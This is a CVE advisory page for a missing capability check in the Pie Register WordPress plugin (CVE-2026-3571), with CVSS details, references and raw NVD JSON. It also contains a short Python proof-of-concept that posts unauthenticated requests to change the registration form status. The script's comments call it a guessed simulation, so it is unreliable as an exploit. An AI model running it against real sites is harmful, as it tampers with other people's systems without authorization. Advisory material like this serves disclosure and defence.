CVE-2026-3571

Description

The Pie Register – User Registration, Profiles & Content Restriction plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pie_main() function in all versions up to, and including, 3.8.4.8. This makes it possible for unauthenticated attackers to change registration form status.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Pie Register <= 3.8.4.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/python3
import requests

def exploit_pie_register(target_url):
    """
    Proof of Concept for CVE-2026-3571
    Attempts to change the registration form status without authentication.
    """
    # The vulnerable endpoint might be an AJAX action or a direct function hook
    # This is a simulation based on the vulnerability description
    payload = {
        'action': 'pie_main',
        'status': 'disabled' # or 'enabled'
    }
    
    try:
        response = requests.post(f"{target_url}/wp-admin/admin-ajax.php", data=payload)
        if response.status_code == 200:
            print(f"[+] Request sent successfully to {target_url}")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed to send request. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with target URL
    exploit_pie_register(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3571
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3571
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3571/
[4] VulDB https://vuldb.com/cve/CVE-2026-3571
[5] https://plugins.trac.wordpress.org/changeset/3494602/pie-register
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/3137a85e-82e3-4111-ae60-1bcf1abd0c0b?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3571", "sourceIdentifier": "[email protected]", "published": "2026-04-04T02:15:59.310", "lastModified": "2026-04-24T18:13:28.877", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Pie Register – User Registration, Profiles & Content Restriction plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pie_main() function in all versions up to, and including, 3.8.4.8. This makes it possible for unauthenticated attackers to change registration form status."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3494602/pie-register", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3137a85e-82e3-4111-ae60-1bcf1abd0c0b?source=cve", "source": "[email protected]"}]}}